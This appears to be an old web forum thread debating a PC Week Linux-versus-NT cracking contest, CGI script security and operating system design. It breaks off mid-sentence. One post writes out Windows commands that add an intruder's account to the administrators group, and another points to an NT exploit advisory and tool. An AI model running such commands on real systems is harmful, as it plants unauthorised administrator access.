As far as your comment about no real OS existing anymore...Ok, I see your point. I see no backup for it, no reasoned explanation. You are right, I personally cannot recall an OS which was the epitome of user friendliness while incredibly powerful. And I agree that the future will have OSes that come closer and closer to that goal. Of course, I believe the future is whatever we make it, so I plan on pushing Linux towards that perfect blend.

LoppEar.

Re:CGI Script Security

[mmoore]

You would be surprised, but I have seen MANY perl scripts that write a log to a file in a directory that has 755 or even 777 permissions. I actually do this myself when I develop them-and worry about the permissions later. So...this may not have been a case of bad CGI-but instead a case of bad implementation.

Pony Up

[quux26]

As a community, we need to ante up, acknowledge that this is something that needs to be worked on, and move on. Perhaps set up a challenge that requires a flaw in the OS to be exploited.

I just have to think that if the same thing happened to the NT box, there would be no grumbles. A victory would be declared and any talk otherwise would be met with much flameage.

Fact is, we all know that Linux can squish NT flat. Let's set up a test that proves that.

My .02
Quux26
http://www.intap.net/~j/

My .02
Quux26

Re:Pony Up

[.havoc]

I disagree.

As a 'web guy', I am alway conscious of the security of my scripts. I carefully watch for openings that could comprimize a clients site due to my oversite.

Had the NT gone down to a CGI loophole, there would not have been great celibrations. The OS should not be criticized do to a CGI programer's ignorance or arogance.

Re:Pony Up

This has nothing to do with the Linux community. The flaw didn't have anything to do with Linux. So there's no need to care about this at all.

I agree, a victory should be declared. But then they should fix their lame CGI and try again.

Re:Pony Up

[dammitjim]

> Fact is, we all know that Linux can squish NT flat. Let's set up a test that proves that.

You sound like MindCraft. The purpose of a test is not to prove something, but rather to TEST something.

These tests are valid - not as a measure of one platform over another, just as a measure of an overall setup. The cgi compromised the Linux box. So fix the cgi, set the test up again, and let's find the next hole.

Re:[offtopic] a gender neutral way to say it

Actually 'they', in common english usage can be either singular or plural. It's perfectly acceptable to use it in this case. he/she leaves out the gender neutral (like marilyn manson). You'd have to use he/she/it (which should bad when you say it) to be perfectly PC. :)

Well what did THIS prove?

[Tarnar]

2 Things:

#1, Absolutely nothing about NT or Linux itself.

#2, A chain is only as strong as it's weakest link. In this case, the weakest link was a poor CGI.

So where from here? Lets try it with a better CGI, maybe let everyone see the conf files or something.

Or maybe PC Week should release all the conf files to the cracked box, so the Community can comment on what should/shouldn't be in there.

Re:Well what did THIS prove?

Quite a lot I think. Let's start with it ought to make some admins nervous about what they are having on their machines.

Secondly it proves that security does not mean setting up a machine with OS XXX, installing ipchains or some other software YYY and thinking that was it.

Me thinks it is a very very dangerous attitude and found on all levels. No technology can replace brains. Do not let this decay into a Linux vs. NT discussion, as as soon as this happens what is really important is going to be lost.

Re:Well what did THIS prove?

[mmoore]

I think that more contests such as this will probably continue to turn out with the same results. Barring from the fact that this was a security blunder in the CGI code (I am assuming perl?)-everyone is right...this was probably also due to a lack of knowledge of administration on the Linux machine. So now the Open Source community has something to take a look at-c'mon people, they have been rubbing it in our faces ever since the Mindcraft tests... Linux is not a perfect OS (yet)-instead of ranting and raving we need to FIX the problems that these tests are cranking out.

I don't get mad, or jealous when Microsoft wins one-and all the excuses in the world aren't going to help. So, apparently what we have learned is that we need to make Linux more secure right out of the box-and easier to configure. (Like I said, don't get me wrong-I do understand that it was a CGI blunder), but we really don't need to use this as yet another 'crutch' to avoid the problems. There are other tests that Linux has failed at-the re-make of the Mindcraft tests didn't prove anything exept that the problems can be REDUCED with good administration, and not RESOLVED. So these are the things we need to be pushing RedHat, SUSE, Caldera, etc... to implement in their distributions.


P.S.: There is a simliar crack-contest going on at http://www.3rdpig.com , and they are offering a $1000 dollar reward as well, you have to get the contents of a file called SecurityDemo. This is a great example of a nice-secure system, but unfortunately it is still pretty buggy. If you go there you will see what I mean. It is very hard to get around, and you are restricted BIG TIME-fork errors flying around in bash, access permissions denied to certain libraries, etc, etc..

Re:Well what did THIS prove?

#1, Absolutely nothing about NT or Linux itself.

#2, A chain is only as strong as it's weakest link. In this case, the weakest link was a poor CGI.

This is only partially true. If it was a weak CGI on Inferno, with a properly designed WWW server, the system security would not have been compromised (there is no "root" anyway). It is the OS responsability to ensure that the weakest link doesn't bring all the OS security down, and Linux failed.

Re:[offtopic] a gender neutral way to say it

[SMN]

Write it this way: "While they didn't exploit an OS-specific hole" ...perfectly good English, and perfectly gender neutral

Actually, the term "they" is plural, leading to a subject/verb disagreement. That really counts as slang and is commonly used, but it's improper English (my teacher jump on us for that). The only proper way to say it that I know of it "While he or she didn't exploit an OS-specific hole..."

Re:[offtopic] a gender neutral way to say it

[DiningPhilosopher]

Referring to a single person of unknown gender as "they" is common slang but is not correct english. "They" is always plural when used correctly.

Many people argue that anything used widely enough becomes correct. This is true but I don't like it (although I don't have time to learn Latin... :-)

From a practical standpoint, using "they" as singular makes a correctly singular noun sound incorrect, e.g. "Everyone was blowing their nose" vs. "Everyone was blowing their noses" - borrowed from the alt.english.usage FAQ. "Everyone" is singular, requiring the singular "nose", but "their nose" sounds strange...

For information than you ever wanted on the topic of gender-neutral pronouns, see The Gender Neutral Pronoun FAQ.

Now for a real test

[ajs]

A real test would have taken several Linux systems and several NT systems (not to mention the other players like FreeBSD, Solaris, etc) and load each one with a competing set of internet content technologies. Let people show how strong or weak THOSE TECHNOLOGIES are, and breakins across-the-board on one OS will show a generic OS weakness.

The only problem is that this only shows the resiliance to script-kiddies. Most of the serious intruders (you know, the ones who do this kind of thing for PROFIT) would never be so stupid as to take part in such a contest. Plus most such intruders are INTERNAL, and end up using non-network based attacks (e.g. physical access, social engineering, etc). As the man said in "War Games": "Mr. Potato Head! Back doors are not our secret!".

There is a point of diminishing returns in tests like these, and I think those of us who have the source to our OSes in our grubby little hands know who's safer.... :-)

Re:wrong

It doesn't matter was os you use, NT, Windows 95, OS/2, AIX, Solaris, Linux, FreeBSD,

It just shows your ignorance. The only OSes you know are Windows and NT (and OS/2, which is similar to Windows).

IF you run a gci script with a massive hole in it you will get hacked.

No. Not on a properly designed OS. Not on Inferno.

Re:wrong

IF you run a gci script with a massive hole in it you will get hacked.

And if you run a program doing peek/poke in the system memory you will crash your machine ? Rh, but that's forbidden by modern OSes ! Well CGI scripts could be similary be forbidden to read/write on the filesystem the same way.

Some people ridiculed DOS, Windows 3.1, Windows 95, MacOS, because they lacked memory protection. The same people must acknowledge that the lack of namespace protection (or at least ACL) makes Linux as ridicule when it comes to security.

MS: 1 Linux: 0

Does any here know enough to crack an NT box? Or are we just a bunch of trash talking bastards.

Re:MS: 1 Linux: 0

As it's set up the NT box can't really be cracked trivially - it could be crashed or DoS'ed but that doesn't count.

One of the easy recent ways to get into an NT box was with this:

http://www.eEye.com/database/advisories/ad060819 99/ad06081999-exploit.html

using ncx.exe ... but the securent host is pretty much immune to this 'sploit.

Not to foam with zealotry or anything but the test is a little silly. Pretty much any Unix box can be locked down real tight (even to the point of running on mostly read only media - but then you lose on "openness" and convenience) and can be made at least or more secure than NT systems ar "out of the box". As well there's a *lot* of quite easily hackable NT hosts out there ...

As for the tone in here well take it with a grain of salt - most linux "workstation end-user" types are less than 16 years old. I'm an old dog (over 40) and have been using and admining *nix for a *long* time. I've seen it hacked and attacked every which way. Security in Unix (and I would think NT as well) is the result of an ongoing a process - it is not an endpoint one achieves and then forgets about. Security is obviously *related* to OS design philosophy (and NT and its VMS heritage is designed with a more closed access model in mind) but if you think that's where it ends, well you'll have an exciting time gaining experience in security and sysadmin'ing over the next few years!

Re:Who wrote the CGI script, what was it used for?

According to JFS who did the crack: "After some searching on the WWW I found out that photoads was a commercial CGI package from "The Home Office Online" (http://www.hoffice.com). It sells for $149, and they grant you access to the source code (Perl), so that you can check and modify it. "

One day there will come a great OS

I agree on your last comment. I can't wait to use a computer that: 1) has no hardware upgrades (all machines [of that series] are built of the same components) 2) uses "intelligent modules" (no software, no operating system) Computers & oprating systems are impractical now (1999). Our grand children will have a hard time understanding, why we where smart enough to fly to the moon ..... but too primitive to think practical? I have a dream ..... one day, someone will built the machine that I can't finish. One day, comunication and education will be available to users without the scare and worry we have to put up with in 1999. I can't wait to go to level II.

Re: That's not an OS crack you idiot

That is stupid. Changing the DNS records to spoof them because of one typo is not cracking the OS - that is dumb.

Re:[offtopic] a gender neutral way to say it

[DiningPhilosopher]

ahem.

That's "MORE information than you ever wanted..."

The CGI used to crack it IS open source

According to JFS who did the crack: "After some searching on the WWW I found out that photoads was a commercial CGI package from "The Home Office Online" (http://www.hoffice.com). It sells for $149, and they grant you access to the source code (Perl), so that you can check and modify it." Having the source code is the way he did what he did, he details how he did just that. Open Source is god's gift to crackers, of course they are promoting it from within the community. It gives them advantages to cracking far more than any thing else you can think of or name. Open source may be good in some ways but it horrible for security!

Re:[offtopic] a gender neutral way to say it

[DiningPhilosopher]

Common usage is far from correct usage... Try watching daytime talk shows.

Re:Must Resist

[C.Lee]

> what is PC Week? It is a magazine oriented towards Windows users. >Actually, it's a magazine for managers of PC networks, not "Windows >This means lots of Novell, NT, and Linux coverage. Those are pretty >much the most popular PC server platforms right now. Most of the

You've *NEVER* read a single issue of PC Week, have you? It's nothing but a Windows-orinated magazine and has been since Day 1 of it's publication. That mag knows only one thing and it's Windows. To claim that this mag has lots of Novell and Linux coverage is laughable. PC Week has never been a platform-neutral magazine like the old Byte and Compute! mags were. To imply otherwise is a flat-out lie.

Re:What if IIS had the hole?

[Shadowlore]

You can download and install IE5 seperately too. According to MS it is still 'integrated' and a part of the OS.

Re:Sounds like a valid result to me

[Zurk]

one word : HURD.

Re:Can you say "one-track mind"?

>Why is network security so complicated in Linux as compared to Windows?


Toys are easier to administer than tools. Especially when you have so few to play with!

some code must be closed

[LocalYokel]

Open source CGI's are fine, if you don't need anything more than Matt Wright's guestbook -- if you're like the other 99% of the world that needs something genuinely useful, you'll have to put some nuts and bolts together. Proprietary code protects internal information. Would an honest person volunteer to help you work out a script for accessing a corporate database for free?

Security through obscurity works, just don't depend on it as your first line of defense. If you don't know who's watching or where the loot is, there's really not much point of picking the lock.

BTW, it's called "PC Weak"...
--

Linux the ever changing thing...

It's amazing how the Linux community expands and contracts the term "Operating System" to fit whatever psychotic rage they are currently going through. A cgi script on a Linux box magically lets users modify the site: THAT ISN'T THE OS! They should have had old Ted Blinglehouser set up the machine because he would have made it rock! ZDNet is against us! Poor, tired Linux! If, on the other hand, RDS (which is an add in filter added by MDAC), VBScript, or Perl on a NT box running in ASP script allowed a security hole it is undeniable proof that the operating system sucks.

If you guys could see yourself without the zealotry you'd realize how ridiculous you all are. I'm sure this will incite 15 Linux lackies to ramble on...save it.

"Linux"

[jcs]

How can this be an accurate test of Linux vs. NT? Linux is just the kernel. The software (GNU or otherwise) is really what's at stake here. If you comprimise a CGI script, what difference does it make whether that script was running on Linux or OpenBSD? The system is still comprimised, and it didn't make any difference what operating system it ran on.

This shouldn't be a Linux vs. NT battle. Make it an Apache vs. IIS battle (or Perl vs. ASP if you want) and leave the underlying operating system out of the whole mess. It just results in bad press for both parties (i.e., in the LinuxPPC contest, the NT server was never actually "hacked", yet it was down half the time which made it look bad.)

Re:"Linux"

This shouldn't be a Linux vs. NT battle. Make it an Apache vs. IIS battle (or Perl vs. ASP if you want)

Wrong. How do you run IIS on Linux ? You can. What OS are you going to run if you want to run apache ? Linux, FreeBSD or a commercial Unix.

This is an accurate test, because one of the first things a company wants these days is to have a WWW server, and using Linux means mostly running apache, while using Windows, means mostly running IIS. This is not always the case, but this is what happens in 90% of the cases.

Re:On what theory?

I'm not sure what happened, and the sight doesn't seem to say, but if they were running CGI input without checking it it they're:
a) Dumb
b) Limited to what that CGI can do.

Alright, and then a MacOS user will tell you that you don't need freaking memory protection, because you just have to check what your program is doing. Sorry but I don't buy that. With a proper OS, it doesn't matter, if your program is fiddling incorrectly in memory, because at worse it'll get a Segmentation Fault, and will be stopped. The same way, in a properly designed OS, it does not matter what a CGI is doing, it will be prevented to do anything it isn't supposed to do. See: with my Inferno example there would be no insecure CGI script. Get the point ? Netscape can crash a Mac, but can't crash Linux. CGIs can compromise Linux, but can't compromise Inferno.

If they configured their machine so that their CGI can do security leaks, what is the OS supposed to do, say "No, you can't do what you want. Go away and stop trying to be creative?"

You could configure CGI to do security leaks on Inferno. Much like you can fiddle with system memory with Linux by using /dev/mem. But by default you are secure. It takes an explicit step to become unsecure. This is what is needed.

You might be able to make an argument that the same sort of flexibility doesn't exist on NT and thus you can't do this sort of stuff

I don't care about NT. Windows 3.1 was the worse OS ever "designed", NT was a decent fix for the design, but the implementation is crap. In general, quality of OSes have been getting worse and worse with time. It is no surprise. When the computers were damn expensive, I was acceptable to spent 1 day of top-level semi-god programmer, to make a program run 10s faster, and the ratio semi-god programmers/computers available was very high. Nowadays, you're going to waste 1 GB to win 10 seconds programmer time (it is ok, it is just the way the things are). Plus there is much pressure to release products as soon as possible, even in eternal beta state.

Remember that Unix was a stripped down version (replacement) of Multics, that was too complex at the time. But nowadays, your average pocket calculator as probably 100 times the CPU/memory power of machines on which Multics was expected to run, so Multics won't be too bloated on modern computer. And Unix, being simpler, doesn't implement everything Multics did (although many features were retrofitted and new one were added).

pcweek test

[ariux]

Sounds like a fair and empirical test to me: set up two boxes with customary tools and security measures, then let people try to hack them. The conclusion: Linux security needs work.

Re:pcweek test

security always needs work

Re:Real world usage.

[xrayspx]

This is exactly what we have at my company. Better to have 3 web-servers OUTSIDE the firewall system, than to have to protect EVERY system inside it. I'm even (quickly) winning my boss over to Linux, I guess I live in a decent world after all.

Opinion..

I personally think that we should all lay off NT for a while... And wait 'till it is adopted by all the banks and ATM machines. This may take some time as the majority of banks have invested heavily in OS/2 but since OS/2 is fast becomming a dead duck, they should change soon enough.

The advantage - anyone with half a brain could then get rich quick by transferring funds from Bill Gates bank account to their own... The lack of security in NT would ensure that the attack was not traced. Okay, one would have to be clever and involve many unaware 3rd party bank accounts and slowly trickle it in to your own... But it could be great!

Ahh... One can dream...
Let all the Microserfs wallow in their false sense of security...

Re:Must Resist

[IntlHarvester]

Check the online PC Week archives at:

http://www.zdnet.com/pcweek/filters/past/

Re:Scientific method

[quux26]

Not wanting to slate you or anything but as a scientist you should know that generally it is better to test and then draw conlusions than to set out to prove something with a test. Alot of this "monday morning quarter-backing" would be avoided if that was the approach used when setting up and observing tests.

Point very well taken. What I mean to say is ...I'm open to admitting that my original premise was flawed. I also would like to point out that my original post was very poorly written.

My .02
Quux26
http://www.intap.net/~j/

My .02
Quux26

Re:Can you say "one-track mind"?

[hawkestein]

The comparison is completely valid. Not all of us are running Linux as a server. Personally, I use it as a development platform. Just because I'm not running Apache doesn't make my Linux box useless (gcc runs just fine).

It's annoying to me that the default Redhat installation is to have all services running, so that it's relatively easy to hack into my system. When you install NT out of the box, it doesn't automatically install a web server, an FTP server, a telnet server (not that NT has telnet servers...)

The point is, for newbies, Linux is insecure. You have to know *something* about network administration to protect your box, even if it means editing your startup scripts or your hosts.deny file. And, as more and more people use ADSL and cable modems (like me), there are more and more insecure Linux boxes out there.

It's Redhat's fault, not Linux's. But it's still a "Linux" distribution issue.
---

Bombproof Linux Webserver

the "hack this" box at www.linuxppc.org is doing well ... Here's wierd things we've done over the years (sometimes all at once):

Remove all shells except sh.

Shutdown everything except the web server port and ssh.

Use tcpwrappers /etc/securetty etc to restrict logins to a limited set of hosts and record scans etc.

Limit the umber of users to a small (3) wheel group (that can be sudo'ed to - root can't be sudo'ed to) and that use a very simple customized admin tasks shell we wrote in python.

Uninstall sendmail and install exim. Have the system forward any mail it needs to send to another box that checks for nastiness

Get your system tuned and then burn / /usr /etc onto a CD (some /etc/ files are symlinks to /var. Our webpages change very little so we burned most of them onto another CD. We have very fast SCSI cd's and huge RAM and a fast disk for swap.

Confuse everyone by running an unusual httpd chrooted to an unusual location etc. etc.

Replace lots of standard shell commands with equivalents written in python (less buffer overflows crap).

etc etc blah blah

Re:Linux lost, period.

I wholeheartly thank the moderator that labelled me as a troll.

I came back to post 30-line patch to illustrate how easy it is to forbid a process to do anything other than read,write,exit,break,munmap, to illustrate my point, but meanwhile, it was official: I'm a troll.

Well thank you very much. I've been specially appealed at the degree of ignorance of Linux users today. I guess it is no longer necessary to post the patch. I guess if I want to make strong but accurate statements about security in general (Multics, capabilities, Inferno,...), I'll have to join the users of another free Unix.

Ziff Davis 0wn3d by MS, your responsibility

[voxman]

They can't easily keep the good reporting out, but they can sure as hell put biased reporting in. Encouraging a novice to set up an NT and a Linux box for a security test is a no-brainer for MS. Out of the box, linux is pretty darn far from secure. It is our responsibility in such tests to crack both boxes, and secure the linux box.

This does prove something

[Al+Wold]

As much as we may hate to admit, this does actually prove some weaknesses, not in linux, but in unix in general. The flexibility of the operating system allows it to be exploited easier in some situations. Since you can do basically anything to the machine from the command line, anything the possibly has access to the command line can do anything, as well if it is compromised.

On NT, this isn't true. You have to use their little GUI to add users and such, so it would be pretty hard to actually be able to intrude the box by exploiting something like a CGI script. You may be able to erase files and things like that, but not actually get in and make yourself an account.

So, basically, the reason Linux lost was because it is flexible and extremely controllable from a command prompt. Can Microsoft say anything like that about NT? This may lead to a loss in security, but I guess it just makes sure we do our homework when setting up remotely accessed services.

Re:Was it really a suprise?

[iceburg]

Another reason I wasn't really surprised was since most webservers run some form of *nix, most "hacks" are designed for *nix. If NT ever gets more webserver share, and more things worth getting into, more NT boxen will be compromised.

Re:What if IIS had the hole?

[cookd]

IIS is much more a part of the operating system than Explorer, which MS argued for weeks was a part of the server. And it is much more a part of the OS than Apache.

You buy Windows NT *SERVER*. You can make it a file server, a domain server, a DHCP server, a WINS server, or an Internet server. If you want it to be an Internet server, you install IIS. IIS is supplied as part of the OS by Microsoft to all owners of NT Server ON THE INSTALL CD's (Apache happens to come with some distros, but it comes as part of the applications library, not as a part of the kernel or base install). It was created by the creators of NT Server (Apache != Linux). It integrates itself into the OS as a system service (Apache doesn't run in kernel space, and doesn't need Admin priviledges).

Now, if you said Netscape Server, things would be different.

Amen Brother

[Hangtime]

Why can't all the distros for Linux and perhaps all the Unices for that matter turn off those things that could are "MAJOR" security risks. Had a couple of Israelis put a sniffer on two Solaris boxes that weren't locked down very well on campus and therefore a whole zone of IPs had to change passwords because of it. Just no need for that sort of thing. Linux and all Unices should come locked down or close to it, then an FAQ explaining all the things that are turned off and why including the security risk they pose. Just one man's opinion.

Hangtime

Re:Amen Brother

[miahrogers]

you see making linux absolutly secure can also be a pain in the ass. For instance you could make a linux box where you had to be root to do any network access or use disk drives. but for the 95% of us who don't give a shitsy about having our computers THAT secure it would just be really annoying. As i understand it redhat also offers a "secure server edition". I haven't used it so i can't vouch for it, but yes it would be nice to have a supersecure linux and a not so secure linux (like mandrake) to play with.
char *stupidsig = "this is my dumb sig";

Re:Sour Grapes - linux lost

[smale]

I couldn't agree more, Red Hat is a terrible distribution, I can't use it, and I have been using Linux for 3 years, primarily Slackware, but I have tried them all and Red Hat hits rock bottom by far.

Jesse and lack of accountability...

[NikoDemous]

The one thing that really pisses me off is that these people who can not even pass the muster as a small town reporter are too chicken to debate.

I've challenged Jesse to debate me online and have never received an answer.

Remember this... Jesse Berst and the like have NO ACCOUNTABILITY! They can say any strange, bizarre thing that pops into their challenged minds without the mildest shred of proof under the guise of journalism.

They don't respond, nor do they take responsibility for their actions. Just typical arrogant Microsoft people.

You do know of course that ZD-Net is essentially a Microsoft flunky. After all... They are owned by SoftBank, and SoftBank (based out of Buffalo, NY) does a LOT of technical support for Microsoft.

I guess there is no such thing as conflict of interest, so they individual who has never touched Linux in his life, (jesse) can go right on saying what he is saying...

Remember his little article on "Can you get fired for recommending Linux?" No case studies, no proof...just towing the Microsoft party line...


Cheers,

Nicholas

PS: In case you haven't guessed a majority of so-called journalists are this way especially on the internet. If it is something they don't understand....oohhh..scary...let's talk bad about it...

Misplaced blame

[Zico]

Not a slam on you, but the problem aren't the contests themselves, or the articles about them. The problem, as you seem to recognize at the beginning (but forgot by the end of your post), are the Linux zealots making the inane posts.

Your solution seems to be saying, "Hey, don't post stories like this because the Linux community has the inability to discuss them without making complete asses of themselves." I know that's not what you meant, but that's really what it boils down to. It also amounts to putting blinders on to squelch any Linux news that isn't positive, just to not awaken the hordes of clueless Linux zealots that will come out en masse with ridiculous replies.

The correct request is, "Would the clueless zealots please bugger off? You're not helping a damn thing." Also helpful would be to score their posts down here, as well as quit scoring down posts just because they made a point not in Linux's favor, even when they weren't trolls or flamebait.

Again, most of what you said was good, but you're just putting the blame in the wrong place.

Cheers,
ZicoKnows@hotmail.com

Re:Misplaced blame

[gregm]

I agree with you. The fault is not Slashdot's, nor Linus's, nor those of us who use and (for the most part) love Linux. However Microsoft has their own zealous counterparts but they have a clear advantage. They can (for the most part;) control their people. We as an open-source community cannot and probably should not try. We can however not go out of our way to fuel the fires of our zealots.

Upon further inspection of my original post and of this post I must conclude my very proposal is about as diametrically opposed to the spirit of Open Source as anything could be. I guess we have to take the good with the bad and hope for the best.

Re:Why the weeping over linux? The NT is vulnerabl

[Zico]

Hey, if the box is still up, post how to hack it. Just make sure you post it before you try it yourself, so I can get that thousand bucks! Oh yeah, and if that machine hasn't been hacked by tomorrow, everyone here will know that you were full of shite -- so get ta crackin'! (Again, after posting the crack here first ;-)

Cheers,
ZicoKnows@hotmail.com

indefensible.

please stop saying "it's not linux' fault".

the real issue here is why someone can install software that brings the core of the machine down.

That's really bad, and reflects a flaw in the system design.

Granted, if someone *goes out of their way* to give a program/process root priveleges, that is not required to have it, then they get what they deserve.

But no program, proprietary or open, should be able to get those kind of priveleges without a system admin specifically and knowingly granting them.

This sounds like a unix/linux system flaw. Personally, I think unix/linux should have a small tight system space, and anything else (ie, web/mail/ftp) is restricted to user land, and the rule should be hard to break.

as a user, it would be tough to bring down linux from a shell. services should be no different.

Re:[offtopic] a gender neutral way to say it

Ah, but then again, English monarchs have demonstrated a disturbing tendency to refer to themselves as "England", which would reinforce the royal we.

Especially in light of the curious English custom of referring to collectives as plurals rather than singulars, e.g.:
Microsoft are a bunch of mindless jerks who will be the first against the wall when the revolution comes,
versus the much more logical American:
Microsoft is a bunch of mindless jerks who will be the first against the wall when the revolution comes

And, for those Douglas Adams fans playing along at home, note that it is my belief that Microsoft IS the Marketing Division of The Sirius Cybernetics Corporation. Share and Enjoy.

Say what?

[Zico]

What part of

net user SirHackalot mypassword /add /fullname:"Joe Q. Hacker"
net group administrators SirHackalot /add

do you not understand?

Cheers,
ZicoKnows@hotmail.com

On what theory?

[raistlinne]

On what theory does an OS never allow anything to be done? Someone's got to be able to bring the system down so that someone can do something with the system. If that person is irresponsible, they're a problem. Handcuffing your users so that they can't do anything is not the solution.

I'm not sure what happened, and the sight doesn't seem to say, but if they were running CGI input without checking it they're:
a) Dumb
b) Limited to what that CGI can do.

If they configured their machine so that their CGI can do security leaks, what is the OS supposed to do, say "No, you can't do what you want. Go away and stop trying to be creative?"

As many people have pointed out, an OS is only as secure as its weakest link. The person at the keyboard is a necessary link, so if they're your weakest link, you're in trouble. The same would go if this was just a bad asp script.

You might be able to make an argument that the same sort of flexibility doesn't exist on NT and thus you can't do this sort of stuff. While that may be true, do remember that walking is generlaly safer than driving. When you can do more, you can also go wrong in more ways.

It all boils down to know what you're doing. I forget who said it, but "If you make a device idiot-proof, nature will make a better idiot."

Re:On what theory?

[HiThere]

I don't know Inferno, and I don't know Multics, but I like your theory. (I suspect the kernel hacking teams agree with you, in general if not in detail.)

To me this says: What system design changes should be made so that this kind of thing isn't a problem again. This is sort of difficult. I don't generally worry about secrecy, so my basic answer tends to be "Have a read only copy, compare checksums, if the checksums change, copy the secure version over the accessible version." Unfortunately 1) it doesn't keep the data secret, and 2) it doesn't allow folk to make changes. If these are concerns, then somebody else's idea needs to be used. I think that they were concerns here, though I'm not real sure. (I've only followed the SlashDot discussion).

Re:On what theory?

To me this says: What system design changes should be made so that this kind of thing isn't a problem again. This is sort of difficult.

Actually the changes would be to implement ACL (or make them mainstream in Linux), capabilities and to change programs to use them. Implementing Inferno namespaces could be a another step, and going further, one would need a way to specify and control what a given a piece of code is allowed to do. For instance I don't found normal at all that every program can read files /etc (read all the configurations of all the program), can read my mail file even if it is xclock, or open a WWW connection to any machine connected to my network.

I don't generally worry about secrecy, so my basic answer tends to be "Have a read only copy, compare checksums, if the checksums change, copy the secure version over the accessible version."

If the OS is cracked you cannot trust it. Once you are root (and if the Linux machine doesn't use "securelevel"), it is relatively easy to peek in /dev/mem to change any kernel code. You need to stop the machine, boot on CDROM, and then compare. Even then you are not 100% safe against top-level crackers (they would trigger bugs in the unmodified file system code Linux, so that it loads their code anyway... difficult to do, but definitly doable with proper tools and a big amount of work).

Hint: go in '/usr/src/linux/arch/i386/kernel/entry.S'. This is where any process MUST go to make a system call (thus to access any information on the system). It is pretty easy to see that if you are adding some checks here you can improve seriously the security of the OS. BTW, other checks are added in some of the functions ('securelevel' checks).

Otherwise you can search for the Linux capability project page, they have some design and code.

Re:I find it interesting that ZDnet ruled out...

[k9-quaint]

Ah, good point. RAS was not on the NT web server in question? or is that a presumption. Do people install/configure RAS on their webservers? If so, I sure hope Microsoft thought about security when they coded RAS, otherwise that would be a huge back door :)

Unix machines are by nature multiuser environments where any user with priveledges can execute instructions on that machine from anywhere. NT was first and foremost a file/print server, second an application server, and lastly a timeshare machine.

One more question, does RAS change the flavor of NT from vanilla to strawbery? or is that a default install option for workstation and/or server?

Re:[offtopic] a gender neutral way to say it

[rossarian]

I propose a new gender-neutral pronoun, which
will solve all of these problems. It combines
'she', 'he', and even 'it', in a paradigm-shifting and wholly accurate pronoun:

shit.

--Andrew

Re: That's not an OS crack you idiot

[Alascom]

>...because of one typo... Apparently security is not a specialty of yours. Most security problems ARE the result of "typos" and small errors. If the code was written incorrectly, and I use that to intercept users or information, how can you deny its a clean hack. Apparently, you young kids who watch a movie or read a book and think your hackers don't really understand what hacking is... Its not always the cool "click the pi symbol and get into the FBI Mainframe." The contest said a valid win was stealing user information, so if they make a typo and I use that to intercept users when they click links, then intercept information from those users, its a clear success. In the real world, the results could be FAR more insideous. -Alascom

Re:knee jerk reactions

[MassacrE]

Because human setup and overconfigurability are UNIX traits. NT does everything for you and does many things poorly. So when an NT box gets hacked it is almost always a flaw in the Operating System level (Including IIS, which is now part of the OS) or in the default configuration.

Nothing is going to happen to apache in the default configuration. But if you get all stupid about configuring it you are opening the floodgates. For instance, using a closed-source CGI script and giving it stupid permissions.

Here are the facts..quickly..

[NikoDemous]

Linux has many services which must be secured.
Installing ssh, or mod_ssl, shutting off some services, applying the latest patches are all part of good system administration. I dare say I've had boxes running for 4 years and more that people have attempted to crack but for good diligence they might have been successfull.

NT is not the worlds most secure solution either. Infact NT as installed flunked the security tests we placed on it as did Linux. Both systems need COMPETENT administrators. A computer is just a tool people. Although I must say (with bias on my part...to be honest) that Microsoft breeds the lazy mentality of "The computer is a magic box" and doesn't really encourage the user/admin to go into it in depth. I've had an MCSE say to me once. "I just want proxy services.. I don't want any IP packets routed accross the network." As though "Proxy Services" were a Microsoft magic or something...very strange indeed.

The real factor is reliability. NT just doesn't scale right now. Maybe it will in the future, but right now it does not. The company of which I am a part has done well over 3,000 installations in medium to large companies all of which have had heterogenous complement.

Lose the "My dog is better" stuff and subscribe to some security newsletters etc. Study systems security.

Cheers,

Nicholas

Try using the defaults then

[raistlinne]

Well, if you're actually running your CGI scripts as root you're just asking someone to break you. By default, CGI scripts are run as the user nobody. Nobody owns no files, is part of no group, and has no login shell. In short, if they compromised a normal cgi script they shouldn't be able to do much more than fill /tmp up. That and read publically available files.

And as soon as you can break into some code running as administrator (or the OS itself, that is something like a third of the code, isn't it?), you can just install BO or something like that and get some decent remote-administratability options.

NT is no more inherently secure in a full security-breach than Linux is. In either case you're screwed if someone can compromise the superuser. And NT has plenty of services either running as administrator or in kernelspace. Can you even run a daemon-like service as a regular user under NT?

Why isn't a Mac involved?

[toupsie]

It would appear if PC Week wanted to have a fair contest, PC Week would have set up a B&W PowerMac G3 serving with WebStar. Why didn't they include a PowerMac G3 in contest? Probably because they know what all Mac users know -- You can't hack a Mac over the Internet! If you visit Attrition.org's hacked web pages archive, you will notice that in the many years of cataloging hacks none of them are Mac servers. Majority of them are Linux and NT boxes. Face it, NT and Linux are inherently insecure by their design. The average MacOS user can set up a web server faster and more secure than the best Linux guru. On top of that, you don't need a firewall to protect the Mac like you do for the lowly Linux or NT server.

Only Apple's MacOS is the secure platform for serving web pages. Just ask the Army. They have seen the light and moved to Mac. If all web servers were MacOS based, the concept of hacking web sites would be moot. Open Source does not mean more secure. If it did, then Linux would have better net security than the closed source MacOS. Clearly this contest has proven, once again, that Linux is an insecure platform to serve web pages.

Free != Better
MacOS Net Security > Linux Net Security
Game, Set, Match, Apple!!!

Re:Real world usage.

What about a DMZ? Does anyone really put their weserver inside their trusted network!!??!

I find it interesting that ZDnet ruled out...

[k9-quaint]

Denial of service attacks. To which NT is nortoriously prone and to which Linux is not. I am not talking about packet storming, but rather boundary cases in the protocol stacks that cause crashes(BlueSoDs) and kernel panics.

Since vanilla NT has virtually no remote administration or remote anything capabilities, it had a natural advantage in this test. Turn off NT File Serving, and you have to put machine code on the stack to change files (annoying and not worth $1000). On Linux, I could just root the machine and then enable telnet, configure the shell of my choice, set all my little aliases, and it would be just like home.

IMHO, NT is more secure out of the box than most Linux distros. If you want perfect security, may I recommend a piece of wood (not as much functionality as NT, but very very secure).

Please stop this nonsense

I do mean it. Give them the publicity they earn, none. All those "Hack my pocket calculator" contests are ridiculous, result in a lot of foaming mouths, quite a lot of wasted bandwitdh and ought to redirected to /dev/null. Even "Man Bites Dog" makes for a more interesting headline and if the dog was made by Sony it might even qualify for ./

Why was this moderated up? The subject maybe?

[ph43drus]

Gavin, I'll give you the point that there are no /perfect/ Operating Systems and that security has to be based on everything running. I would like to point something out to you though:

Modern Computers are /Complex/, therefore, to get the most out of them, you are going to be dealing with something complex

You go and wait for the perfect operating system. Tell me about it when it gets written. I'm going to work with what is out there now.

-Jeff

Rules

[zempf]

The rules state:



